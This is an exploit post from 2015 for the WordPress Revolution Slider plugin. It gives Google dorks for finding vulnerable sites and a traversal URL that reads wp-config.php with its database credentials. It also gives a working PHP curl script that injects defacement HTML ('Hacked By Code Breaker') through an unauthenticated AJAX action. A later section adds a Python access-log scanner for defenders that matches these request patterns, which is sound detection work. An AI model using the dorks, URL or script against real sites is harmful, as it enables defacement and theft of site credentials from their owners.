Tuesday, 12 May 2015

Wordpress Plugin Revolution Slider - Unrestricted File Upload

######################################################################
# Exploit Title: Wordpress Plugin Revolution Slider - Unrestricted File Upload
# Google Dork: inurl://"co.il/wp-admin/admin-ajax.php?action=revslider_ajax_action"
inurl://".co.il/wp-admin/admin-ajax.php?action="
inurl:admin-ajax.php?action=revslider_show_image
-intext:"revslider_show_image" & your own
# Exploit Author: Code Breaker(Team Cyber Switch)
# Vendor HomePage: http://revolution.themepunch.com/
# Version: old
# Tested on: Windows
######################################################################
# Path of File : /wp-content/plugins/revslider/revslider_admin.php
# Get Config/database mysql :  victim.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
# Vulnerable File : revslider_admin.php

# Exploit :

<?php

$post = array
(
"action" => "revslider_ajax_action",
"client_action" => "update_captions_css",
"data" => "<body style='color: transparent;background-color: black'><center><h1><b style='color: white'><center>Hacked By Code Breaker<p style='color: transparent'>"
);

$ch = curl_init ("http://localhost/wp-admin/admin-ajax.php");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);

?>

# Path of Result : /wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
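
For defenders, both request patterns named in the advisory are visible in the query string of web-server access logs. The sketch below is an added example, not part of the original advisory or the plugin's code. It assumes combined-format access logs, and the sample lines, `classify` and `scan` are constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Constructed sample access-log lines (combined format, documentation IP ranges).
SAMPLE_LOG = """\
203.0.113.7 - - [12/May/2015:10:01:02 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 200 3120 "-" "Mozilla/5.0"
203.0.113.7 - - [12/May/2015:10:01:09 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=%2e%2e%2fwp-config.php HTTP/1.1" 200 3120 "-" "Mozilla/5.0"
198.51.100.4 - - [12/May/2015:10:02:00 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=uploads/2015/05/slide1.jpg&w=200 HTTP/1.1" 200 18211 "-" "Mozilla/5.0"
203.0.113.7 - - [12/May/2015:10:03:30 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.4 - - [12/May/2015:10:04:00 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 64 "-" "Mozilla/5.0"
"""

REQUEST = re.compile(r'^(\S+) .*?"(GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')
IMAGE_EXT = (".jpg", ".jpeg", ".png", ".gif")

def classify(line):
    """Return (client_ip, finding) for a request worth reviewing, else None."""
    m = REQUEST.match(line)
    if not m:
        return None
    ip, _method, target, status = m.groups()
    path, _, query = target.partition("?")
    if not path.endswith("/admin-ajax.php"):
        return None
    params = parse_qs(query)  # parse_qs percent-decodes, so %2e%2e%2f becomes ../
    action = params.get("action", [""])[0]
    if action == "revslider_show_image":
        img = params.get("img", [""])[0].replace("\\", "/")
        # An image endpoint has no reason to serve parent-directory or non-image paths.
        if ".." in img.split("/") or not img.lower().endswith(IMAGE_EXT):
            return ip, f"file-read attempt img={img!r} status={status}"
    if action == "revslider_ajax_action":
        client_action = params.get("client_action", [""])[0]
        if client_action in ("update_captions_css", "get_captions_css"):
            return ip, f"captions css access client_action={client_action} status={status}"
    return None

def scan(log_text):
    """Classify every line and keep only the findings."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]

if __name__ == "__main__":
    for ip, finding in scan(SAMPLE_LOG):
        print(ip, finding)
```

The exploit above sends `action` and `client_action` in the POST body, which access logs do not record, so catching the `update_captions_css` write itself needs request-body inspection (for example at a WAF) or a check of the stored captions CSS for unexpected markup.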

- REFERENCE
[2] http://www.exploit4arab.net/exploits/1405

Demo:
